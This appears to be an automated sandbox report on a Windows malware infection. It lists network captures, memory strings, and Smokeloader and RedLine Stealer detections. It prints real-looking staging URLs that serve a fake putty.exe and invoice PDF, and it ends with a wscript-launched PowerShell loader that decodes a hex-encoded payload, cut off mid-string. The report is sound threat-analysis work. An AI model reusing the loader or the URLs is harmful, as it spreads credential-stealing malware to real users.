                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Dec 2024 08:25:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                  Source: powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drString found in binary or memory: http://acsk.privatbank.ua/crl/PB.crl0
                  Source: powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drString found in binary or memory: http://acsk.privatbank.ua/crldelta/PB-Delta.crl0
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drString found in binary or memory: http://acsk.privatbank.ua/download/certificates/certificates.p7b0C
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drString found in binary or memory: http://acsk.privatbank.ua/services/ocsp/0L
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drString found in binary or memory: http://acsk.privatbank.ua/services/tsp/0C
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2215211118.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: explorer.exe, 0000000C.00000000.2205441339.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: svchost.exe, 00000007.00000002.3332246487.00000178BC000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2215211118.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2215211118.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2215211118.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 0000000C.00000000.2215211118.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: explorer.exe, 0000000C.00000000.2212797768.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.2212857401.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.2211752150.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.r
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD6969D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/f
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fd
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdj
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjs
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjsk
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf8
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88c
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cv
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/i
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/in
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/inv
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invo
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoc
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoce
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoce2
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoce2.
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoce2.p
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoce2.pd
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoce2.pdf
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/invoce2.pdfp
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/p
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/pu
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/put
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/putt
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/putty
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/putty.
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/putty.e
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/putty.ex
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/putty.exe
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: explorer.exe, 0000000C.00000000.2230471266.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: 2D85F72862B55C4EADD9E66E06947F3D0.5.drString found in binary or memory: http://x1.i.lencr.org/
                  Source: explorer.exe, 0000000C.00000000.2222539640.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: explorer.exe, 0000000C.00000000.2208689710.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 0000000C.00000000.2208689710.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 0000000C.00000000.2206796100.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                  Source: powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000007.00000003.2141167240.00000178BBE10000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 0000000C.00000000.2222539640.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: explorer.exe, 0000000C.00000000.2215211118.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                  Source: explorer.exe, 0000000C.00000000.2215211118.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 6.3.putty.exe.1f90000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.3.ddhfdfu.620000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.putty.exe.6d0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.ddhfdfu.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.ddhfdfu.610e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2152981082.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.2421108452.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2474086059.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000006.00000002.2239261367.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000000D.00000002.2474059930.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000D.00000002.2473769295.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000000D.00000002.2474086059.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000006.00000002.2239346704.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328